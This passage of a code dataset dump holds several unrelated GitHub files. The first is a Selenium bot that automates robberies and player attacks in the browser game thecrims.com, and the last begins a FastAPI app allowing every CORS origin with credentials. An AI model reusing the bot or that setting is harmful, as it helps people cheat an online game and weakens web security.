\"Pander\": 150000,\n \"Bitch Ruler\": 200000,\n \"Kingpin\": 300000,\n \"Mobster\": 450000,\n \"Padrino\": 600000,\n \"Godfather\": 3000000\n },\n \"Broker\": {\n \"Prospect\": 100,\n \"Hangaround\": 100,\n \"Criminal\": 100,\n \"Thug\": 100,\n \"Mafioso\": 10000,\n \"Capo\": 40000,\n \"Consigliere\": 75000,\n \"Boss\": 150000,\n \"Don\": 200000,\n \"Kingpin\": 300000,\n \"Mobster\": 450000,\n \"Padrino\": 600000,\n \"Godfather\": 3000000\n },\n \"Dealer\": {\n \"Prospect\": 100,\n \"Hangaround\": 100,\n \"Criminal\": 100,\n \"Thug\": 100,\n \"Mafioso\": 10000,\n \"Capo\": 40000,\n \"Consigliere\": 75000,\n \"Boss\": 150000,\n \"Don\": 200000,\n \"Kingpin\": 300000,\n \"Mobster\": 450000,\n \"Padrino\": 600000,\n \"Godfather\": 3000000\n }\n\n}\n\nignore_list = [ \"Godfather\", \"Padrino\", \"Mobster\", \"Kingpin\", \"Don\", \"Top executive\", \"Bitch Ruler\", \"Mugger\", \"Cut-throat\", \"Murderer\", \"Butcher\", \"Desperado\"]\nname_ignore = [ \"LanceHenriksen\", \"fraggerek\", \"Copat6\"]\n\n# patched cdc chromedriver\ndriver = webdriver.Chrome(\"chromedriver\")\nexecutor_url = driver.command_executor._url\nsession_id = driver.session_id\n\ndef attach_to_session(executor_url, 
session_id):\n original_execute = WebDriver.execute\n def new_command_execute(self, command, params=None):\n if command == \"newSession\":\n # Mock the response\n return {'success': 0, 'value': None, 'sessionId': session_id}\n else:\n return original_execute(self, command, params)\n # Patch the function before creating the driver object\n WebDriver.execute = new_command_execute\n driver = webdriver.Remote(command_executor=executor_url, desired_capabilities={})\n driver.session_id = session_id\n # Replace the patched function with original function\n WebDriver.execute = original_execute\n return driver\n\n# Open site + login\ndef login():\n global driver, login_name, password_text\n driver.get(\"https://www.thecrims.com/\")\n \n\n # write username to form\n username_input = WebDriverWait(driver, 50).until(EC.visibility_of_element_located((By.XPATH, '//*[@id=\"loginform\"]/input[1]')))\n if username_input:\n try:\n username_input = driver.find_element_by_xpath('//*[@id=\"loginform\"]/input[1]')\n username_input.send_keys(f'{login_name}') \n except Exception as e: \n print(e)\n\n # write password to form\n password_input = WebDriverWait(driver, 50).until(EC.visibility_of_element_located((By.XPATH, '//*[@id=\"loginform\"]/input[2]')))\n if password_input:\n try:\n password_input = driver.find_element_by_xpath('//*[@id=\"loginform\"]/input[2]')\n password_input.send_keys(f'{password_text}') \n except Exception as e: \n print(e)\n \n try:\n login_button = driver.find_element_by_xpath('//*[@id=\"loginform\"]/button') \n login_button.click()\n except Exception as e: print(e)\n\n# Get stamina\ndef getStamina():\n global current_stamina, percent_stamina\n stamina_bar = WebDriverWait(driver, 5).until(EC.presence_of_element_located((By.XPATH, '//*[@id=\"nightclub-singleassault-attack-18\"]/div')))\n if stamina_bar:\n current_stamina = driver.find_element_by_xpath('//*[@id=\"nightclub-singleassault-attack-18\"]/div').value_of_css_property(\"width\")\n percent_stamina = round(100*float(current_stamina[:-2])/128)\n\n# Get addiction\ndef getAddiction():\n global current_toxic, percent_toxic\n toxic_bar = WebDriverWait(driver, 5).until(EC.presence_of_element_located((By.XPATH, '//*[@id=\"nightclub-singleassault-attack-19\"]/div')))\n if toxic_bar:\n current_toxic = driver.find_element_by_xpath('//*[@id=\"nightclub-singleassault-attack-19\"]/div').value_of_css_property(\"width\")\n percent_toxic = round(100*float(current_toxic[:-2])/128)\n\ndef printStamina():\n global current_stamina, percent_stamina\n getStamina()\n print(\"[INFO] stamina - \" + str(percent_stamina))\n\ndef printToxic():\n global current_toxic, percent_toxic\n getAddiction()\n print(\"[INFO] toxic - \" + str(percent_toxic))\n\ndef goRobMenu():\n pass\n\ndef selectRob():\n pass\n\n# Rob single\ndef robSingle():\n global percent_stamina, percent_toxic\n global driver\n getStamina()\n getAddiction()\n\n if int(percent_toxic) >= 2:\n detox() \n # detox\n \n if int(percent_stamina) < 100:\n refreshStamina()\n\n # //*[@id=\"menu-robbery\"]\n \n robbery_button = WebDriverWait(driver, 20).until(EC.visibility_of_element_located((By.XPATH, '//*[@id=\"menu-robbery\"]')))\n if robbery_button:\n robbery_button.click()\n robbery_button = WebDriverWait(driver, 20).until(EC.visibility_of_element_located((By.XPATH, '//*[@id=\"menu-robbery\"]')))\n if robbery_button:\n robbery_button.click()\n \n select = WebDriverWait(driver, 5).until(EC.presence_of_all_elements_located((By.XPATH, \"//*[@id='singlerobbery-select-robbery']\")))\n select = 
WebDriverWait(driver, 20).until(EC.presence_of_all_elements_located((By.XPATH, \"//*[@id='singlerobbery-select-robbery']/option[@value='8']\")))\n if select:\n # selector = driver.find_element_by_xpath('//*[@id=\"singlerobbery-select-robbery\"]')\n # all_options = selector.find_elements_by_tag_name(\"option\")\n # for option in all_options:\n # if \"SP: 100%\" in option.text:\n # print(\"%s -> %s\" % (option.get_attribute(\"value\"), option.text.strip()), end=\"\\n\")\n selector = Select(driver.find_element_by_xpath('//*[@id=\"singlerobbery-select-robbery\"]'))\n #selector.select_by_value('1')\n selector.select_by_value('48')\n\n #//*[@id=\"full\"]\n checkbox_button = driver.find_element_by_xpath('//*[@id=\"full\"]')\n #print(checkbox_button.is_selected())\n if checkbox_button.is_selected() == False:\n checkbox_button.click()\n\n # //*[@id=\"singlerobbery-rob\"]\n # let's rob\n rob_button = driver.find_element_by_xpath('//*[@id=\"singlerobbery-rob\"]')\n if rob_button:\n rob_button.click()\n time.sleep(1)\n\n# detox\ndef detox():\n global percent_toxic\n global driver\n # //*[@id=\"menu-hospital\"]\n hospital_button = driver.find_element_by_xpath('//*[@id=\"menu-hospital\"]')\n if hospital_button:\n hospital_button.click()\n # metdaone\n # //*[@id=\"content_middle\"]/div/div[3]/table[1]/tbody/tr[5]/td[4]/input\n # //*[@id=\"content_middle\"]/div/div[3]/table[1]/tbody/tr[5]/td[4]/input\n metadone_input = WebDriverWait(driver, 5).until(EC.visibility_of_element_located((By.XPATH, '//*[@id=\"content_middle\"]/div/div[3]/table[1]/tbody/tr[5]/td[4]/input')))\n if metadone_input:\n try:\n metadone_input = driver.find_element_by_xpath('//*[@id=\"content_middle\"]/div/div[3]/table[1]/tbody/tr[5]/td[4]/input')\n metadone_input.send_keys(f'{percent_toxic}') \n except Exception as e: \n print(e)\n \n try:\n metadone_button = driver.find_element_by_xpath('//*[@id=\"content_middle\"]/div/div[3]/table[1]/tbody/tr[5]/td[4]/button') \n metadone_button.click()\n except Exception as e: print(e)\n\n# Go to rave - get full stamina - get out\ndef refreshStamina():\n global driver\n global percent_stamina, percent_toxic\n # go to rave -> //*[@id=\"menu-nightlife\"]\n rave_button = WebDriverWait(driver, 5).until(EC.visibility_of_element_located((By.XPATH, '//*[@id=\"menu-nightlife\"]')))\n if rave_button:\n rave_button = driver.find_element_by_xpath('//*[@id=\"menu-nightlife\"]')\n if rave_button:\n rave_button.click()\n\n # rave 1 //*[@id=\"content_middle\"]/div/div[3]/div[3]/ul[4]/li[1]/div/div[2]/div[2]/button\n # //*[@id=\"content_middle\"]/div/div[3]/div[3]/ul[2]/li[1]/div/div[2]/div[2]/button\n #\n # rave 2 //*[@id=\"content_middle\"]/div/div[3]/div[3]/ul[4]/li[2]/div/div[2]/div[2]/button\n \n # //*[@id=\"content_middle\"]/div/div[3]/div[2]/table/tbody/tr[2]/td[5]/div/button\n # \n rave_button = WebDriverWait(driver, 5).until(EC.visibility_of_element_located((By.XPATH, '//*[@id=\"content_middle\"]/div/div[3]/div[2]/table/tbody/tr[1]/td[5]/div/button')))\n if rave_button:\n rave_button = driver.find_element_by_xpath('//*[@id=\"content_middle\"]/div/div[3]/div[2]/table/tbody/tr[1]/td[5]/div/button')\n # //*[@id=\"content_middle\"]/div/div[3]/div[2]/table/tbody/tr[1]/td[5]/div/button\n if rave_button:\n rave_button.click()\n \n # buy hooker stamina \n # //*[@id=\"content_middle\"]/div/div[3]/table[2]/tbody/tr/td[4]/button\n # //*[@id=\"nightclub-drug-buy-button-2957\"]\n rave_button = WebDriverWait(driver, 5).until(EC.visibility_of_element_located((By.XPATH, '//*[starts-with(@id, 
\"nightclub-drug-buy-button\")]')))\n if rave_button:\n rave_button = driver.find_element_by_xpath('//*[starts-with(@id, \"nightclub-drug-buy-button\")]')\n if rave_button:\n rave_button.click()\n\n\n # leave rave -> \n # //*[@id=\"exit-button-l5Jol5-ZaWnLl2-Wl3CYm5yTapdplWeVmGZlm2eanJmdmGaXnQ\"]\n\n # //*[@id=\"exit-button-l5Jol5-ZaWnLl2-Wl3CYm5yTapdplWeVmGZlm2eanJmdmGaXnQ\"]\n # //*[@id=\"exit-button-aWVtmm1mmJ7HaWdox5pox5-Ua2JmkmyXbGVlaWWXaJJva2uaaw\"]\n # //*[@id=\"exit-button-aWVtmm1mmJ7HaWdox5pox5-Ua2JmkmyXbGVlaWWXaJJva2uaaw\"]\n\n # //*[@id=\"exit-button-aGGalnGcapyZYmljyXCbmHFhbWZpmmucZWaWcWacnZNuZ5iWbw\"]\n\n #rave_button = WebDriverWait(driver, 5).until(EC.visibility_of_element_located((By.XPATH, '//*[@id=\"exit-button-l5Jol5-ZaWnLl2-Wl3CYm5yTapdplWeVmGZlm2eanJmdmGaXnQ\"]')))\n rave_button = WebDriverWait(driver, 5).until(EC.visibility_of_element_located((By.XPATH, '//*[starts-with(@id, \"exit-button\")]')))\n if rave_button:\n #rave_button = driver.find_element_by_xpath('//*[@id=\"exit-button-l5Jol5-ZaWnLl2-Wl3CYm5yTapdplWeVmGZlm2eanJmdmGaXnQ\"]')\n rave_button = driver.find_element_by_xpath('//*[starts-with(@id, \"exit-button\")]')\n # //*[starts-with(@id, \"exit-button\")]\n if rave_button:\n rave_button.click()\n time.sleep(2)\n\n # //*[@id=\"exit-button-aWVtnG1omJyWa2FonJZjycucaWiWlnGaapNrYWZpk2draG2WZA\"]\n # //*[@id=\"exit-button-aWVtnG1omJyWa2FonJZjycucaWiWlnGaapNrYWZpk2draG2WZA\"]\n # //*[@id=\"exit-button-aWVtnG1omJyWa2FonJZjycucaWiWlnGaapNrYWZpk2draG2WZA\"]\n\n\n # buy booze - //*[@id=\"nightclub-drug-buy-button-2415\"]\n # //*[@id=\"nightclub-drug-buy-button-2415\"]\n\ndef prepareHunt():\n # hunt info\n\n # get list of top killers\n\n # make list of dangerous classes\n\n # set target respect\n\n # save them globally\n pass \n\ndef randomString(stringLength=8):\n letters = string.ascii_lowercase\n return ''.join(random.choice(letters) for i in range(stringLength))\n\ndef scanVisitors():\n global driver, original_stdout\n global ignore_list\n # scan for players\n \n try:\n visitor_list = WebDriverWait(driver, 2).until(EC.visibility_of_element_located((By.XPATH, '/html/body/div[2]/div[4]/div/table/tbody/tr/td[1]/div[2]/table/tbody/tr/td/div[2]/div/div[3]/div[1]/h3')))\n if visitor_list:\n #print(\"-> found visitors.\")\n try:\n visitor_div = driver.find_element_by_xpath('/html/body/div[2]/div[4]/div/table/tbody/tr/td[1]/div[2]/table/tbody/tr/td/div[2]/div/div[3]/div[1]')\n visitors = visitor_div.find_elements_by_xpath('.//*[starts-with(@class, \"visitor-\")]')\n for visitor in [visitors[0]]:\n #log_name = 'logs/visitor_{}'.format(randomString(8))\n #print(log_name)\n\n #with open(log_name + \"_details.html\", 'w') as f:\n #f.write(visitor.get_attribute('innerHTML'))\n #print(visitor.get_attribute('innerHTML'))\n\n # find stats\n # name\n # respect\n # profession\n # level\n soup = BS(visitor.get_attribute('innerHTML'), 'html.parser')\n visitor_name = \"\"\n for div in soup.find_all('div', attrs={'class': 'user_list_username'}):\n visitor_name = div.text.strip()\n \n first_children = [i.text for i in soup.select('.visitor_information div:last-child')]\n #print(first_children)\n #print(first_children[-1])\n visitor_respect = first_children[-1].strip()\n visitor_respect = visitor_respect.replace(\"Respect:\", \"\").strip()\n visitor_respect = int(visitor_respect)\n # nth-last-child(2)\n first_children = [i.text for i in soup.select('.visitor_information div:nth-last-child(2)')]\n visitor_prof = first_children[0].strip()\n\n first_children = [i.text for i in 
soup.select('.visitor_information div:nth-last-child(3)')]\n visitor_rank = first_children[0].strip()\n\n rank_text = \"\"\n estimate_power = \"\"\n\n print(\"{} : {} - {} - {} \".format(colored(visitor_name,\"blue\"), colored(f'{visitor_respect:,}', \"green\"), colored(visitor_prof, \"yellow\"), colored(visitor_rank, \"magenta\")))\n # find boom box\n # click choose\n # nightclub-singleassault-select-open\n try:\n select_open = visitor.find_element_by_xpath('.//*[starts-with(@id, \"nightclub-singleassault-select-open\")]')\n if select_open:\n select_open.click()\n \n\n # click single\n # nightclub-select-assault-type-single\n type_single = visitor.find_element_by_xpath('.//*[starts-with(@id, \"nightclub-select-assault-type-single\")]')\n if type_single:\n type_single.click()\n\n attack_him = False\n if visitor_rank != \"Hitman\":\n if visitor_name not in name_ignore:\n if visitor_prof not in ignore_list:\n if visitor_respect <=160000:\n attack_him = True\n else:\n if visitor_respect <=70000:\n attack_him = True\n\n # click kill\n # nightclub-attack\n type_kill = visitor.find_element_by_xpath('.//*[starts-with(@id, \"nightclub-attack\")]')\n if type_kill:\n if attack_him:\n type_kill.click()\n leaveRave(sleep=1)\n print(\"{} : {} - {} - {} \".format(colored(visitor_name,\"red\"), colored(f'{visitor_respect:,}', \"green\"), colored(visitor_prof, \"yellow\"), colored(visitor_rank, \"magenta\"))) \n time.sleep(5)\n return\n #driver.quit()\n #sys.exit(0)\n else:\n pass\n #print(\"You are safe for now -> {} : {} - {} - {} \".format(colored(visitor_name,\"red\"), colored(f'{visitor_respect:,}', \"green\"), colored(visitor_prof, \"yellow\"), colored(visitor_rank, \"magenta\")))\n leaveRave(sleep=1)\n except:\n leaveRave(sleep=1)\n except:\n leaveRave(sleep=2)\n except:\n pass\n\ndef scanPrey():\n global driver\n global percent_stamina, percent_toxic\n try:\n getStamina()\n if int(percent_stamina) < 50:\n refreshStamina()\n getAddiction()\n if int(percent_toxic) >= 5:\n detox() \n enterRandomRave(sleep=0)\n scanVisitors()\n leaveRave(sleep=0)\n except:\n increaseErrorCount()\n\ndef increaseRaveCount():\n global rave_counter\n rave_counter += 1\n #print(\"[INFO] - Raves visited : {}\".format(rave_counter))\n\ndef goDrinkBoze():\n pass\n\ndef goRaveMenu(sleep=2):\n global driver\n if sleep == -1:\n sleep = random.randint(2,5)\n time.sleep(sleep)\n try:\n rave_button = WebDriverWait(driver, 5).until(EC.visibility_of_element_located((By.XPATH, '//*[@id=\"menu-nightlife\"]')))\n if rave_button:\n rave_button = driver.find_element_by_xpath('//*[@id=\"menu-nightlife\"]')\n if rave_button:\n rave_button.click()\n except:\n increaseErrorCount()\n\ndef leaveRave(sleep=5):\n global rave_counter\n if sleep == -1:\n sleep = random.randint(3,7)\n global driver\n try:\n rave_button = WebDriverWait(driver, 2).until(EC.visibility_of_element_located((By.XPATH, '//*[starts-with(@id, \"exit-button\")]')))\n if rave_button:\n rave_button = driver.find_element_by_xpath('//*[starts-with(@id, \"exit-button\")]')\n if rave_button:\n rave_button.click()\n \n increaseRaveCount()\n time.sleep(sleep)\n except:\n increaseErrorCount()\n\ndef enterRandomRave(sleep=0):\n global driver\n if sleep == -1:\n sleep = random.randint(2,5)\n time.sleep(sleep)\n rave_number = random.randint(3, 10)\n xpath_rave = '(//button[contains(@class,\"btn btn-inverse btn btn-inverse btn-small pull-right\")])[{}]'.format(rave_number)\n try:\n rave_button = WebDriverWait(driver, 4).until(EC.visibility_of_element_located((By.XPATH, xpath_rave)))\n if 
rave_button:\n rave_button = driver.find_element_by_xpath(xpath_rave)\n if rave_button:\n rave_button.click()\n except:\n increaseErrorCount()\n\ndef checkErrorCount():\n global error_counter, driver\n # if error_counter == 50:\n # print(\"[INFO] ABORTED DUE TO ERROR COUNT - {}\".format(error_counter))\n # leaveRave(sleep=0)\n # driver.quit()\n # sys.exit(1)\n\ndef increaseErrorCount():\n global error_counter\n error_counter += 1\n checkErrorCount()\n\ndef hunt():\n # hunt\n pass\n # go to rave menu\n\n # if stam < 50 - first thing when enter rave - drink fast\n\n # enter random disco with booze\n\n # scan for players\n\n # check for danger name or profession - rank\n # escape if danger\n\n\n # check respect\n\n # hit\n\n # leave rave\n\n # sleep random\n\n\n\nif __name__ == \"__main__\":\n login()\n #robSingle()\n #time.sleep(20)\n time.sleep(5)\n while True:\n #robSingle()\n goRaveMenu(sleep=2)\n scanPrey()\n","repo_name":"archwiz/tc-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":21352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33830254031","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# [tf-mnist]\n#\n# Overview:\n# MNIST (handwritten digit recognition) using TensorFlow\n#\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nBATCH_SIZE = 50\n\n# Create the object that holds the MNIST data\nmnist = input_data.read_data_sets(\"./data/\", one_hot = True)\n\n# Fetching training data (one batch)\n# train_images, train_labels = mnist.train.next_batch(BATCH_SIZE)\n# (50, 784)\n# print(train_images.shape) \n\n# All test images, shape (10000, 784)\n# test_images = mnist.test.images\n# All test labels, shape (10000, 10)\n# test_labels = mnist.test.labels\n\n# (Study notes)\n#\n# The difference between Variable and Placeholder\n#\n# [Variable]\n# A data structure for defining and storing the weights and parameters of the network's input, hidden and output layers\n# [Placeholder]\n# A data structure that defines the shape of the data fed to the neural net as input\n#\n# https://qiita.com/eve_yk/items/e42431200a1616c7d045\n# https://qiita.com/icoxfog417/items/fb5c24e35a849f8e2c5d\n# https://qiita.com/MENDY/items/49bff2c16d7a49243acd (how to define functions)\n\n# Define the input data (a placeholder, since this is fed in at run time)\nx = tf.placeholder(tf.float32, [None, 784])\n\n# Input image\n# reshape to (batch size, height, width, channels)\nimg = tf.reshape(x, [-1, 28, 28, 1])\ntf.summary.image(\"input_data\", img, 100)\n\n#===\n# Network definition\n#===\n#\n# From the input layer (x) to the hidden layer (h_1)\nwith tf.name_scope(\"hidden\"):\n w_1 = tf.Variable(tf.truncated_normal([784, 64], stddev = 0.1), name = \"w1\")\n b_1 = tf.Variable(tf.zeros([64]), name = \"b1\")\n h_1 = tf.nn.relu(tf.matmul(x, w_1) + b_1) # y = RELU((x * w) + b)\n # Log the distribution of the hidden-layer weights\n tf.summary.histogram(\"w_1\", w_1)\n \n# From the hidden layer (h_1) to the output layer (out)\nwith tf.name_scope(\"output\"):\n w_2 = tf.Variable(tf.truncated_normal([64, 10], stddev = 0.1), name = \"w2\")\n b_2 = tf.Variable(tf.zeros([10]), name = \"b2\")\n out = tf.nn.softmax(tf.matmul(h_1, w_2) + b_2)\n\n\ny = tf.placeholder(tf.float32, [None, 10])\n# Define the loss function\nwith tf.name_scope(\"loss\"):\n loss = tf.reduce_mean(tf.square(y - out))\n tf.summary.scalar(\"loss\", loss)\n \n# Trainer object\nwith tf.name_scope(\"train\"):\n train_step = tf.train.GradientDescentOptimizer(0.5).minimize(loss)\n\n# Accuracy evaluation\nwith tf.name_scope(\"accuracy\"):\n correct = tf.equal(tf.argmax(out,1), tf.argmax(y,1))\n accuracy = tf.reduce_mean(tf.cast(correct, tf.float32))\n tf.summary.scalar(\"accuracy\", accuracy)\n \n# Initialization\ninit = tf.global_variables_initializer()\n\n# Merge all the summaries\nsummary_op = tf.summary.merge_all()\n\n# Run the training\nwith tf.Session() as sess:\n
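 # Summary events are written under ./logs; view them with: tensorboard --logdir logs\n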
 summary_writer = tf.summary.FileWriter(\"logs\", sess.graph)\n sess.run(init)\n \n # All test images, shape (10000, 784)\n test_images = mnist.test.images\n # All test labels, shape (10000, 10)\n test_labels = mnist.test.labels\n\n for i in range(10000):\n step = i + 1\n train_images, train_labels = mnist.train.next_batch(BATCH_SIZE)\n sess.run(train_step, feed_dict = {x: train_images, y: train_labels})\n if step % 10 == 0:\n # Take a snapshot of the summaries for logging\n summary_str = sess.run(summary_op, feed_dict = {x: test_images, y: test_labels})\n summary_writer.add_summary(summary_str, step)\n acc_val = sess.run(accuracy,feed_dict = {x: test_images, y: test_labels})\n print('Step %d: accuracy = %.2f' % (step, acc_val))\n","repo_name":"hisashi-ito/tensorflow-lesson","sub_path":"mnist/tf-mnist.py","file_name":"tf-mnist.py","file_ext":"py","file_size_in_byte":3666,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2166893430","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param A : head node of linked list\n # @return the head node in the linked list\n def solve(self, A):\n zero, one = 0, 0\n temp = A\n while temp is not None:\n if temp.val == 0: zero += 1\n else: one += 1\n temp = temp.next\n temp = A\n while temp is not None:\n if zero > 0:\n temp.val = 0\n zero -= 1\n else:\n temp.val = 1\n temp = temp.next\n return A\n","repo_name":"itsmesoumik23/iBit-Solutions","sub_path":"sort binary linkedlist.py","file_name":"sort binary linkedlist.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22030544758","text":"# Time complexity: O(logn)\n# Space complexity: O(1)\nclass Solution:\n def firstBadVersion(self, n: int) -> int:\n good = 0\n bad = n\n\n while bad > good + 1:\n mid = good + ((bad - good) // 2)\n if isBadVersion(mid):\n bad = mid\n else:\n good = mid\n\n return bad ","repo_name":"redhudy/my-leetcode-solutions","sub_path":"solutions/0278. First Bad Version/0278.py","file_name":"0278.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"13350589954","text":"from builtins import range\nimport sys\nsys.path.insert(1,\"../../\")\nimport h2o\nfrom tests import pyunit_utils\nimport os\n\nfrom h2o.estimators.gbm import H2OGradientBoostingEstimator\n\nimport random\n\ndef pub_444_spaces_in_filenames():\n\n # tempdir = \"smalldata/jira/\"\n # if it was okay to write to smalldata, it's okay to write to the current directory\n # probably don't want to, but can't find what the standard temp directory is supposed to be. 
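\n    # (Python's tempfile.gettempdir() would be the usual answer, for what it's worth.)\n    # 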
no sandbox?\n tempdir = \"./\"\n # make a few files with spaces in the name\n f1 = open(pyunit_utils.locate(tempdir) + \"foo .csv\", \"w\")\n f1.write(\"response, predictor\\n\")\n for i in range(10):\n f1.write(\"1, a\\n\")\n f1.write(\"0, b\\n\")\n f1.write(\"1, a\\n\" if random.randint(0,1) else \"0, b\\n\")\n f1.close()\n\n f2 = open(pyunit_utils.locate(tempdir) + \"b a r .csv\", \"w\")\n f2.write(\"response, predictor\\n\")\n for i in range(10):\n f2.write(\"1, a\\n\")\n f2.write(\"0, b\\n\")\n f2.write(\"1, a\\n\" if random.randint(0,1) else \"0, b\\n\")\n f2.close()\n\n f3 = open(pyunit_utils.locate(tempdir) + \" ba z.csv\", \"w\")\n for i in range(10):\n f3.write(\"1, a\\n\")\n f3.write(\"0, b\\n\")\n f3.write(\"1, a\\n\" if random.randint(0,1) else \"0, b\\n\")\n f3.close()\n\n train_data = h2o.upload_file(path=pyunit_utils.locate(tempdir + \"foo .csv\"))\n train_data.show()\n train_data.describe()\n train_data[\"response\"] = train_data[\"response\"].asfactor()\n gbm = H2OGradientBoostingEstimator(ntrees=1, distribution=\"bernoulli\", min_rows=1)\n gbm.train(x=list(range(1,train_data.ncol)), y=\"response\", training_frame=train_data)\n gbm.show()\n\n train_data = h2o.upload_file(path=pyunit_utils.locate(tempdir + \"b a r .csv\"))\n train_data.show()\n train_data.describe()\n train_data[\"response\"] = train_data[\"response\"].asfactor()\n\n gbm = H2OGradientBoostingEstimator(ntrees=1, distribution=\"bernoulli\", min_rows=1)\n gbm.train(x=1, y=\"response\", training_frame=train_data)\n\n gbm.show()\n\n train_data = h2o.upload_file(path=pyunit_utils.locate(tempdir + \" ba z.csv\"))\n train_data.show()\n train_data.describe()\n train_data[0]=train_data[0].asfactor()\n gbm = H2OGradientBoostingEstimator(ntrees=1, distribution=\"bernoulli\", min_rows=1)\n gbm.train(x=1, y=0, training_frame=train_data)\n gbm.show()\n\n os.remove(pyunit_utils.locate(tempdir) + \"foo .csv\")\n os.remove(pyunit_utils.locate(tempdir) + \"b a r .csv\")\n os.remove(pyunit_utils.locate(tempdir) + \" ba z.csv\")\n\n\n\nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(pub_444_spaces_in_filenames)\nelse:\n pub_444_spaces_in_filenames()\n","repo_name":"h2oai/h2o-3","sub_path":"h2o-py/tests/testdir_jira/pyunit_pub_444_spaces_in_filenames.py","file_name":"pyunit_pub_444_spaces_in_filenames.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","stars":6553,"dataset":"github-code","pt":"61"} +{"seq_id":"17492490547","text":"from rest_framework.generics import ListAPIView\nfrom rest_framework import filters\nfrom basics.serializers import AmountUnitSerializer, CurrencySerializer\nfrom .models import AmountUnit, Currency\n\n\nclass AmountUnitView(ListAPIView):\n queryset = AmountUnit.objects.all()\n serializer_class = AmountUnitSerializer\n filter_backends = [filters.OrderingFilter]\n ordering = ('id', )\n\n\nclass CurrencyView(ListAPIView):\n queryset = Currency.objects.all()\n serializer_class = CurrencySerializer\n filter_backends = [filters.OrderingFilter]\n ordering = ('id', )\n","repo_name":"metalgear-dev/recipe-manager-backend","sub_path":"basics/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29876438172","text":"import cv2 as cv\n\nimg = cv.imread('photos/profile.jpg')\ncv.imshow('profile', img)\n\ngray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\ncv.imshow('profile', gray)\n\nhaar_cascade = 
cv.CascadeClassifier('haarcascade_frontalface.xml')\nfaces_rect = haar_cascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=3)\n\nprint(f'Number of faces found = {len(faces_rect)}')\n\ncv.waitKey(0)","repo_name":"GitataY/Computer-vision","sub_path":"detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44351817750","text":"#Single Customer Control\r\n\r\n\r\nclass Account:\r\n \r\n def __init__(self,owner,balance):\r\n \r\n self.owner=owner\r\n self.balance=balance\r\n \r\n \r\n def __str__(self):\r\n return f'Account Owner : {self.owner}\\nAccount Balance: {self.balance}'\r\n \r\n \r\n def deposit(self,money):\r\n print('Deposit Accepted')\r\n self.balance+=money\r\n \r\n \r\n def withdraw(self,money):\r\n if(money<=self.balance):\r\n print('Withdrawl Accepted')\r\n self.balance-=money\r\n else:\r\n print('Funds Unavailable')\r\n\r\n\r\nname=input('Enter the customer\\'s name : ')\r\nbal=float(input('Enter the balance in account : '))\r\nacc=Account(name,bal)\r\nwhile True:\r\n print('Type (\\'w\\' for withdrawl , \\'d\\' for deposite , \\'e\\' for exit)')\r\n ch=input('Enter choice : ')\r\n if ch.lower()=='w' :\r\n acc.withdraw(float(input('Money to be withdrawn : ')))\r\n print(f'Your available account balance = {acc.balance}\\n')\r\n elif ch.lower()=='d' :\r\n acc.deposit(float(input('Money to be deposited : ')))\r\n print(f'Your available account balance = {acc.balance}\\n')\r\n elif ch.lower()=='e':\r\n break\r\n else:\r\n print('OOPs! Error Occured')\r\n\r\n","repo_name":"prabhatmalhan/Bank","sub_path":"single_customer.py","file_name":"single_customer.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22570712903","text":"import time\nfrom fastapi import FastAPI, Request\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom src.core.settings import settings\nfrom src.api.base_router import base_router\n\n\ntags = [\n {\n \"name\": \"auth\",\n \"description\": \"Вход в админ-панель\"\n },\n {\n \"name\": \"users\",\n \"description\": \"Управление пользователями админ-панели\"\n },\n {\n \"name\": \"bots\",\n \"description\": \"Управление ботами\"\n },\n {\n \"name\": \"intents\",\n \"description\": \"Взаимодействие с интентами\"\n },\n {\n \"name\": \"client_chat\",\n \"description\": \"Взаимодействие с клиентским чатом\"\n },\n {\n \"name\": \"admin_chat\",\n \"description\": \"Взаимодействие с чатом в админ-панели\"\n },\n {\n \"name\": \"relations\",\n \"description\": \"Управление связями\"\n },\n {\n \"name\": \"ml\",\n \"description\": \"Взаимодействие с моделями\"\n },\n]\n\napp = FastAPI(\n title='Центральный сервер',\n description=\"\"\"\n Анекдот от ChatGPT:\n \n Однажды разработчики создали API, но они забыли задокументировать его.\n Они решили добавить Swagger для описания API и документации.\n Однако они были так увлечены написанием документации, что забыли реализовать сам API.\n Так что, когда кто-то попытался использовать их API, он вернул только один ответ: \"Документация недоступна\".\n \n Moral of the story: Не забывайте, что Swagger - это всего лишь инструмент для документирования вашего API, а не сам API.\n \"\"\",\n version='0.3.3',\n openapi_tags=tags,\n docs_url=settings.docs_url,\n redoc_url=settings.redoc_url,\n)\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n 
